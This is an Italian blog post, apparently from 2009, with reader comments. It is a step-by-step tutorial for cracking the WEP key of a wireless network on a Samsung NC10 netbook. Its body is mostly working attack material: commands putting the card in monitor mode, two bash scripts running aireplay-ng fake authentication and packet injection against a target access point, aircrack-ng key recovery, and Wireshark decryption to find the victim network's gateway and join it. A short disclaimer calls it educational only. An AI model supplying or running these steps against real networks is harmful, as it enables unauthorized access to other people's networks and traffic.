Samsung NC10 – Wep Cracking

Premetto che quest’articolo è solo a fini didattici, detto questo possiamo iniziare a parlare di come approntare il nostro netbook Samsung NC 10 per il wep cracking.

Primo step (Linux onboard):

Installare Linux Ubuntu o Kubuntu su una partizione libera oppure tramite Wubi, quest’ultimo sistema, vi permette di installare Linux direttamente da Windows, evitando così tutti i problemi di partizionamento ed una volta installato, al reboot del computer, avrete la doppia scelta Windows o Linux.

Secondo step (installiamo i driver MadWifi):

Facciamo il boot da Linux.
Installiamo i drivers wireless per Linux:
bisogna installare il pacchetto build-essential e compilare i driver madwifi ed i madwifi-tools (sudo apt-get install madwifi-tools), ma occorre disabilitiare i driver con restrizioni che riconoscono la scheda ma non le permettono di funzionare:
Sistema>Amministrazione>Driver Hardware e cliccare sul tasto Disattiva in basso a destra, quindi riavviare il sistema.
Dopo queste operazioni, scarichiamo gli ultimi driver madwifi da QUI , ed estraiamoli sul Desktop, apriamo un terminale e digitiamo:
sudo apt-get install build-essential, che è il pacchetto contenente i software necessari alla compilazione dei driver, quindi sempre da terminale, si passerà alla compilazione dei drivers:
cd Scrivania/madwifi-hal* (se abbiamo scompattato i drivers sul Desktop)
sudo make
sudo make install
sudo modprobe ath_pci

Per far sì che i drivers siano caricati automaticamente all’avvio.
sudo gedit /etc/modules o sudo kate /etc/modules
e in fondo al file, aggiungiamo:
ath_pci
salviamo e riavviamo.
Al riavvio successivo, la scheda wireless dovrebbe essere visibile e configurabile cliccando sull’icona di Network Manager nel tray, oppure, vi consiglio di usare WiCd e disinstallare il Networtk Manager.
(Nota personale: dopo tutta questa procedura, ho pure ripristinato i driver con restrizioni e tutto funziona)

Terzo Step (armiamo il sistema):

Scarichiamo la suite Aircrack-ng da Installa pacchetti o da terminal windows digitando:

sudo apt-get install aircrack-ng

Dopo quest’operazione digitiamo in terminal window il comando:

iwconfig

dovremmo vedere una cosa simile (ho oscurato i miei riferimenti con delle X):

wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”XXXXXX” Nickname:””
Mode:Managed Frequency:2.437 GHz Access Point: XX:XX:XX:XX:XX:XX
Bit Rate:24 Mb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=32/70 Signal level=-61 dBm Noise level=-93 dBm
Rx invalid nwid:780 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Adesso ci tocca mettere la nostra scheda wireless (ath0) in “Monitor mode”, quindi digitiamo:

sudo airmon-ng stop ath0
sudo airmon-ng start wifi0

poi

iwconfig
wifi0 no wireless extensions.

ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.437 GHz Access Point:
Bit Rate:24 Mb/s Tx-Power:18 dBm Sensitivity=1/1
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality=32/70 Signal level=-61 dBm Noise level=-93 dBm
Rx invalid nwid:780 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

A questo punto dobbiamo rilevare le reti disponibili:
scriviamo:

sudo airodump-ng ath0

e avremo un output del genere:

CH 11 ][ BAT: 34 mins ][ Elapsed: 8 s ][ 2009-01-24 12:32

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:XX:2E:XX:XX:A8 8 4 2 0 11 54. WEP WEP Pippo
00:04:BE:XX:68:XX 28 27 0 0 6 54. WPA TKIP PSK
BSSID STATION PWR Rate Lost Packets Probes

dal quale capiamo che c’è una rete wireless protetta dal WEP, sul canale 11 con MAC Adddress: 00:XX:2E:XX:XX:A8 e ESSID: Pippo

adesso possiamo iniziare l’attacco, apriamo 4 terminal windows, nella prima scriviamo:

sudo airodump-ng atho -w pacchetti_pippo –bssid 00:XX:2E:XX:XX:A8 -c 11

Ma, facciamo un passo indietro, prima di lanciare airodump-ng, dobbiamo scrivere un paio di script bash:

primo.sh
# /bin/bash/
# questo script serve ad autenticarvi presso l’AP (Access Point) da attaccare
#echo “Scrivi il mio mac:”
#read mio_mac
echo “Scrivi l’interfaccia settata in monitor mode:”
read i
# qui mettete il Mac della vostra scheda
# lo scoprite con iwconfig
mio_mac=”00:00:00:00:00:00″
echo “scrivi il MAC ADDRESS DELL’AP da attaccare”
read mac_ap
echo “scrivi l’essid della wlan da attaccare:”
read SSID_wlan
aireplay-ng -1 0 -e $SSID_wlan -a $mac_ap -h $mio_mac $i

Qui i dati saranno il MAC di Pippo e il nome Pippo (essid).

Lanciamo primo.sh con:

sudo sh primo.sh

Poi scriviamo secondo.sh:
# /bin/bash/
# qui mettete il Mac della vostra scheda
# lo scoprite con iwconfig
mio_mac=”00:00:00:00:00:00″
echo “Scrivi l’interfaccia settata in monitor mode:”
read i
echo “Scrivi ESSID dell’AP:”
read e
echo “scrivi il MAC ADDRESS DELL’AP”
read mac_ap
aireplay-ng -3 -e $e -b $mac_ap -h $mio_mac $i

lanciamo secondo.sh con:

sudo sh secondo.sh

Questo script serve a iniettare (packet injection), i pacchetti sull’AP, al fine di generare traffico e poter catturare molti pacchetti, da dare in pasto all’ultima arma: aircrack-ng

nell’ultima terminal window scriviamo:

sudo aircrack-ng -z -b mac_di_pippo pacchetti_pippo*.cap

ma basterebbe anche solo:
sudo aircrack-ng -z pacchetti_pippo*.cap

lasciamolo lavorare….dopo un tot. di tempo, dai 3 ai 10 minuti, a seconda della forza del segnale, otterrete una key found in esadecimale:

KEY FOUND! [ XX:D1:F2:67:4D:18:6B:XX:XX:XX:1X:XX:XX ]
Decrypted correctly: 100%

A questo punto abbiamo la password in esadecimale, la possiamo già usare così, inserendola nel nostro gestore di reti, sia in Windows sia in Linux, la WEP Key Hex e non la WEP Key Passphrase.
Però, se vogliamo vedere se caso mai è una key umanamente leggibile possiamo provare a scrivere questo:

echo key_trovata | xxd -r -p

Adesso rimane l’ultimo problema, come trovare la sottorete ed il gateway dell’AP di Pippo?

lanciamo Wireshark, che avete previamente scaricato ed installato, poi apriamo i pacchetti pippo_pacchetti.cap (da File->Apri)
andiamo a su Edit -> Preferenze-> Protocolli
sceliamo il protocollo IEEE 802.11
ed inseriamo nel campo key1 la key che abbiamo trovato, poi un bel Applica ed infine un OK.
A questo punto vedremo i paccchetti in chiaro, con anche i botta e risposta del gateway col nostro computer, da qui si può risalire a che sottorete appartenga l’AP attaccato e qual’è il gateway.
Per i DNS, basterà usare gli OpenDNS ed il gioco è fatto!

Chiaramente, il wireshark, può anche non servire, se l’AP ha il DHCP attivato, quindi assegna automaticamente indirizzo IP, Gateway e DNS.

Infine scriviamo:

sudo rmmod ath_pci
e
sudo modprobe ath_pci

al fine di ripristinare la nostra scheda wireless per poter navigare.

Naturalmente, si può ampliare il discorso degli attacchi aireplay, del forging del MAC della propria scheda, dell’uso di Kismet…ma questo lo lascio a voi😉

Nanni Bassetti

Articolo Articolo Storico Storico Stampa Stampa

Commenti
# 1
Ottimo riassunto
Di Ralf (inviato il 23/02/2009 @ 11:55:43)
# 2
Ciao, ho trovato molto interessante questa pagina, soprattutto in virtù del fatto che è specifica per il Samsung NC10, tuttavia ho un problema, perché settando ath0 o wifi0 in secondo.sh mi dice comunque “No replay interface specified”
Di Stefano (inviato il 28/02/2009 @ 00:42:30)
# 3
Non so che dirti…quella è la procedura devi aver sbagliato qualcosa tu…
perchè in secondo.sh la riga:
aireplay-ng -3 -e $e -b $mac_ap -h $mio_mac $i

prende il nome della scheda in variabile $i, che è impostata nella richiesta:

echo “Scrivi l’interfaccia settata in monitor mode:”
read i

Sennò lascia perdere i bash script e vai in manuale e vedi se continua a darti errore ok?😉
ciao
Di Nanni Bassetti

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: